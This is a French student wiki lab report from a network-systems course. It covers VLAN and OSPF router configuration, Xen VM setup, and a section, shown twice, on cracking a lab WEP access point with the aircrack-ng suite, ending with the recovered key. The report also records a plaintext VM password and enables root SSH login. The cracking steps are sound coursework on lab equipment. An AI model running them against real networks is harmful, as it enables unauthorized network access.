TP sysres IMA5 2021/2022 G3 : Différence entre versions

De Wiki d'activités IMA
(Crackage de clefs wifi)
Ligne 158 : Ligne 158 :
  
 
== Crackage de clefs wifi ==
 
== Crackage de clefs wifi ==
 +
 +
    airmon-ng start wlan0mon
 +
 +
cela affiche toutes les cracottes ( les pts wifi)
 +
ensuite on ecoute les trames wifi dela cracotte choisie ( la 03)
 +
pour cela, on utilise :
 +
    airodump-ng --encrypt wep wlan0mon
 +
on a son adresse MAC : 04:DA:D2:9C:50:52
 +
 +
 +
on va ensuite récupérer le BSSID associé à notre cracotte03 grace a son ESSID trouvé précéde>
 +
 +
 +
    aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:50
 +
 +
Puis, un recupere le bssid et enfin
 +
 +
    airodump-ng -c 4 --bssid 04:DA:D2:9C:50:52 -w output wlan0mon
 +
 +
On utilise ensuite :
 +
 +
    aircrack-ng output-01.cap pour recupérer le mot de passe !
 +
 +
notre mot de passe, trouvé en 4:09m est 55:55:55:55:5A:BC:04:CB:A4:44:44:44:44
 +
!

Version du 10 janvier 2022 à 14:59

Ceci est la contribution du groupe G3 ( numéroté groupe 2 ) aux travaux pratiques de réseau de cette 5ème Année. Le groupe est constitué de Axel Chemin et de Guillaume PERSON.


Première séance

Table d'adressage

Dans la première séance, toute la promotion s'est divisée en groupes qui se sont attachés à une tâche en particulier. Nous nous sommes pour notre part attelés à la partie adressage, avec les groupes 0, 5, 6, 8,9 et 10. Nous avons déterminé les tables d'adressage des VLAN ainsi que des adresses IP du VLAN 42 ( qui est le VLAN que nous avons choisi pour être celui associé aux machines virtuelles).

Le résultat de cette réflexion peut être trouvé ici : [1]



Configuration en SR-52

Dans un second temps, il a fallu configurer les trous routeurs situés en E-304, E-306 et SR-52. L'équipe 0 et nous-mêmes sommes allés configurer le routeur situé en SR-52.

Voici ce qui a été fait et qui a causé le dérèglement de la plateforme.

Commandes rentrées :


enable

configure

interface Gigabitethernet 0/18 (ou Gi0/18)

switchport mode access

switchport access vlan 531 // permet de déplacer l’interface Gi0/18 sur le vlan 531


// config adresse ipv4 :

interface vlan 531

ip address 192.168.222.43 255.255.255.248


//config adresse ipv6

interface vlan 531

ipv6 address 2001:660:4401:60b0::3/64

ipv6 unicast-routing //done

//interconnexion

router ospf 1

ipv4 router-id 192.168.222.43

summary-address 193.48.57.176 255.255.255.240

summary-address ??

summary-adress

redistribute connected subnets

redistribute static subnets route-map ospf

network 192.168.222.32 0.0.0.7 area 10

network 192.168.222.40 0.0.0.7 area 20

default-information originate

//done

//filtre pour ospf

route ospf 1

summary-address 10.0.0.0 255.0.0.0 not-advertise

//done



Enfin, nous avons tenté de configurer le router avec la fibre. Nous devons aussi configurer le cas d'interconnexion pour l'ipv6.

Seconde séance

Gestion de la machine virtuelle

Pour cette séance nous créons la machine virtuelle sur Capbreton

Il faut d'abord se connecter en root (mot de passe habituel) sur Capbreton.

Pour utiliser le miroir Debian de l'école : export http_proxy=http://proxy.plil.fr:3128

En utilisant Xen pour créer notre image : xen-create-image --hostname=Kasteel --ip=193.48.57.178 --gateway=193.48.57.190 --netmask=255.255.255.224 --dir=/usr/local/xen --password=pasglop dist=debian

Les volumes logiques pour les répertoires home et var doivent être créés : lvcreate -L10G -n KasteelHome storage lvcreate -L10G -n KasteelVar storage

On peut vérifier le statut des volumes : vgdisplay lvdisplay [path]

Et vérifier qu'ils soient bien en ext4 : file -Ls /dev/storage/ mkfs.ext4 Kasteel


dans : nano /etc/xen/Kasteel.cfg

root = '/dev/xvda2 ro' disk = [

                 'file:/usr/local/xen/domains/Kasteel/disk.img,xvda2,w',
                 'file:/usr/local/xen/domains/Kasteel/swap.img,xvda1,w',
                 'phy:/dev/storage/KasteelHome,xvda3,w'
                 'phy:/dev/storage/KasteelVar,xvda4,w'
             ]


vif = [ 'ip=193.48.57.178 ,mac=00:16:3E:88:65:42 ,bridge=IMA5sc' ]


Et on lance la machine pour s'y connecter. xen create -c /etc/xen/Kasteel.cfg


on configure SSH, déjà lancé, mais il faut permettre root de s'y connecter : /etc/ssh/sshd.config => PermitRootLogin yes

et on redémarre le service : service ssh restart

On installe installe Apache2. => ne marche pas, pas connecté au réseau

On arrive à ping 193.48.57.188 et 189, pas 190

VRRP : redondance de routeur, choix du meilleur routeur OSPF : les routeurs s'échangent leurs routes


Tests d'intrusion

Recherche de failles du système

Nous recherchons des failles systèmes sur le ee. lsb_release -a

 on est en Devuan 2.1


Honey à descendre

A ajouter en dossier compressé avec mot de passe

Crackage de clefs wifi

    airmon-ng start wlan0mon

cela affiche toutes les cracottes ( les pts wifi) ensuite on ecoute les trames wifi dela cracotte choisie ( la 03) pour cela, on utilise :

   airodump-ng --encrypt wep wlan0mon

on a son adresse MAC : 04:DA:D2:9C:50:52


on va ensuite récupérer le BSSID associé à notre cracotte03 grace a son ESSID trouvé précéde>


   aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:50

Puis, un recupere le bssid et enfin

   airodump-ng -c 4 --bssid 04:DA:D2:9C:50:52 -w output wlan0mon

On utilise ensuite :

   aircrack-ng output-01.cap pour recupérer le mot de passe !

notre mot de passe, trouvé en 4:09m est 55:55:55:55:5A:BC:04:CB:A4:44:44:44:44

!